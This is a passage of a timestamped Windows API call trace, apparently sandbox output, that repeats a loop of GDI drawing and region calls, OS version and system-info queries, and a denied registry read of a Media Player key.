lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.663] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.663] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.663] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.663] BeginPath (hdc=0x0) returned 0 [0017.663] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.663] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.663] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.664] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.664] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.664] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.664] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.664] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.664] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xab04027d [0017.664] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb5040713 [0017.664] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bd7 [0017.664] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bd8 [0017.664] CombineRgn (hrgnDst=0x1040bd7, hrgnSrc1=0xab04027d, hrgnSrc2=0xb5040713, iMode=1) returned 1 [0017.664] CombineRgn (hrgnDst=0x1040bd8, hrgnSrc1=0xab04027d, hrgnSrc2=0xb5040713, iMode=4) returned 2 [0017.664] CreateSolidBrush (color=0xff) returned 0x2100bd6 [0017.664] CreateSolidBrush (color=0xff0000) returned 0x1100bd9 [0017.664] DeleteObject (ho=0x1100bd9) returned 1 [0017.664] DeleteObject (ho=0xb5040713) returned 1 [0017.664] DeleteObject (ho=0xab04027d) returned 1 [0017.664] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.664] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.664] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.664] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.664] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.664] BeginPath (hdc=0x0) returned 0 [0017.664] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.664] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.664] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.664] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.664] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.664] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.665] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.665] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.665] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb6040713 [0017.665] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xac04027d [0017.665] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bda [0017.665] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bdb [0017.665] CombineRgn (hrgnDst=0x1040bda, hrgnSrc1=0xb6040713, hrgnSrc2=0xac04027d, iMode=1) returned 1 [0017.665] CombineRgn (hrgnDst=0x1040bdb, hrgnSrc1=0xb6040713, hrgnSrc2=0xac04027d, iMode=4) returned 2 [0017.665] CreateSolidBrush (color=0xff) returned 0x2100bd9 [0017.665] CreateSolidBrush (color=0xff0000) returned 0x1100bdc [0017.665] DeleteObject (ho=0x1100bdc) returned 1 [0017.665] DeleteObject (ho=0xac04027d) returned 1 [0017.665] DeleteObject (ho=0xb6040713) returned 1 [0017.665] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.665] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.665] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.665] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.665] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.665] BeginPath (hdc=0x0) returned 0 [0017.665] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.665] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.665] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.665] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.665] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.665] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.665] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.665] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.666] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xad04027d [0017.666] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb7040713 [0017.666] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bdd [0017.666] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bde [0017.666] CombineRgn (hrgnDst=0x1040bdd, hrgnSrc1=0xad04027d, hrgnSrc2=0xb7040713, iMode=1) returned 1 [0017.666] CombineRgn (hrgnDst=0x1040bde, hrgnSrc1=0xad04027d, hrgnSrc2=0xb7040713, iMode=4) returned 2 [0017.666] CreateSolidBrush (color=0xff) returned 0x2100bdc [0017.666] CreateSolidBrush (color=0xff0000) returned 0x1100bdf [0017.666] DeleteObject (ho=0x1100bdf) returned 1 [0017.666] DeleteObject (ho=0xb7040713) returned 1 [0017.666] DeleteObject (ho=0xad04027d) returned 1 [0017.666] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.666] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.666] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.666] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.666] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.666] BeginPath (hdc=0x0) returned 0 [0017.666] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.666] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.666] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.666] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.666] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.666] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.666] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.666] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.666] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb8040713 [0017.666] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xae04027d [0017.666] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040be0 [0017.666] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040be1 [0017.667] CombineRgn (hrgnDst=0x1040be0, hrgnSrc1=0xb8040713, hrgnSrc2=0xae04027d, iMode=1) returned 1 [0017.667] CombineRgn (hrgnDst=0x1040be1, hrgnSrc1=0xb8040713, hrgnSrc2=0xae04027d, iMode=4) returned 2 [0017.667] CreateSolidBrush (color=0xff) returned 0x2100bdf [0017.667] CreateSolidBrush (color=0xff0000) returned 0x1100be2 [0017.667] DeleteObject (ho=0x1100be2) returned 1 [0017.667] DeleteObject (ho=0xae04027d) returned 1 [0017.667] DeleteObject (ho=0xb8040713) returned 1 [0017.667] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.667] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.667] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.667] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.667] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.667] BeginPath (hdc=0x0) returned 0 [0017.667] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.667] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.667] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.667] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.667] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.667] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.667] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.667] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.667] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xaf04027d [0017.667] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb9040713 [0017.667] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040be3 [0017.667] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040be4 [0017.667] CombineRgn (hrgnDst=0x1040be3, hrgnSrc1=0xaf04027d, hrgnSrc2=0xb9040713, iMode=1) returned 1 [0017.667] CombineRgn (hrgnDst=0x1040be4, hrgnSrc1=0xaf04027d, hrgnSrc2=0xb9040713, iMode=4) returned 2 [0017.667] CreateSolidBrush (color=0xff) returned 0x2100be2 [0017.667] CreateSolidBrush (color=0xff0000) returned 0x1100be5 [0017.667] DeleteObject (ho=0x1100be5) returned 1 [0017.667] DeleteObject (ho=0xb9040713) returned 1 [0017.668] DeleteObject (ho=0xaf04027d) returned 1 [0017.668] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.668] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.668] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.668] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.668] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.668] BeginPath (hdc=0x0) returned 0 [0017.668] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.668] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.668] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.668] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.668] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.668] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.668] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.668] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.668] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xba040713 [0017.668] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb004027d [0017.668] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040be6 [0017.668] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040be7 [0017.668] CombineRgn (hrgnDst=0x1040be6, hrgnSrc1=0xba040713, hrgnSrc2=0xb004027d, iMode=1) returned 1 [0017.668] CombineRgn (hrgnDst=0x1040be7, hrgnSrc1=0xba040713, hrgnSrc2=0xb004027d, iMode=4) returned 2 [0017.668] CreateSolidBrush (color=0xff) returned 0x2100be5 [0017.668] CreateSolidBrush (color=0xff0000) returned 0x1100be8 [0017.668] DeleteObject (ho=0x1100be8) returned 1 [0017.668] DeleteObject (ho=0xb004027d) returned 1 [0017.668] DeleteObject (ho=0xba040713) returned 1 [0017.668] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.668] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.668] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.669] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.669] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.669] BeginPath (hdc=0x0) returned 0 [0017.669] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.669] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.669] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.669] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.669] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.669] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.669] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.669] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.669] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb104027d [0017.669] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xbb040713 [0017.669] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040be9 [0017.669] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bea [0017.669] CombineRgn (hrgnDst=0x1040be9, hrgnSrc1=0xb104027d, hrgnSrc2=0xbb040713, iMode=1) returned 1 [0017.669] CombineRgn (hrgnDst=0x1040bea, hrgnSrc1=0xb104027d, hrgnSrc2=0xbb040713, iMode=4) returned 2 [0017.669] CreateSolidBrush (color=0xff) returned 0x2100be8 [0017.669] CreateSolidBrush (color=0xff0000) returned 0x1100beb [0017.669] DeleteObject (ho=0x1100beb) returned 1 [0017.669] DeleteObject (ho=0xbb040713) returned 1 [0017.669] DeleteObject (ho=0xb104027d) returned 1 [0017.669] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.669] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.669] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.669] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.669] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.669] BeginPath (hdc=0x0) returned 0 [0017.669] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.669] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.669] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.670] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.670] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.670] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.670] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.670] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.670] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xbc040713 [0017.670] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb204027d [0017.670] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bec [0017.670] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bed [0017.670] CombineRgn (hrgnDst=0x1040bec, hrgnSrc1=0xbc040713, hrgnSrc2=0xb204027d, iMode=1) returned 1 [0017.670] CombineRgn (hrgnDst=0x1040bed, hrgnSrc1=0xbc040713, hrgnSrc2=0xb204027d, iMode=4) returned 2 [0017.670] CreateSolidBrush (color=0xff) returned 0x2100beb [0017.670] CreateSolidBrush (color=0xff0000) returned 0x1100bee [0017.670] DeleteObject (ho=0x1100bee) returned 1 [0017.670] DeleteObject (ho=0xb204027d) returned 1 [0017.670] DeleteObject (ho=0xbc040713) returned 1 [0017.670] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.670] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.670] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.670] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.670] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.670] BeginPath (hdc=0x0) returned 0 [0017.670] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.670] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.670] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.670] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.670] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.671] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.671] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.671] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.671] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb304027d [0017.671] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xbd040713 [0017.671] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bef [0017.671] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bf0 [0017.671] CombineRgn (hrgnDst=0x1040bef, hrgnSrc1=0xb304027d, hrgnSrc2=0xbd040713, iMode=1) returned 1 [0017.671] CombineRgn (hrgnDst=0x1040bf0, hrgnSrc1=0xb304027d, hrgnSrc2=0xbd040713, iMode=4) returned 2 [0017.671] CreateSolidBrush (color=0xff) returned 0x2100bee [0017.671] CreateSolidBrush (color=0xff0000) returned 0x1100bf1 [0017.671] DeleteObject (ho=0x1100bf1) returned 1 [0017.671] DeleteObject (ho=0xbd040713) returned 1 [0017.671] DeleteObject (ho=0xb304027d) returned 1 [0017.671] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.671] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.671] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.671] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.671] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.671] BeginPath (hdc=0x0) returned 0 [0017.671] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.671] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.671] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.671] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.672] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: 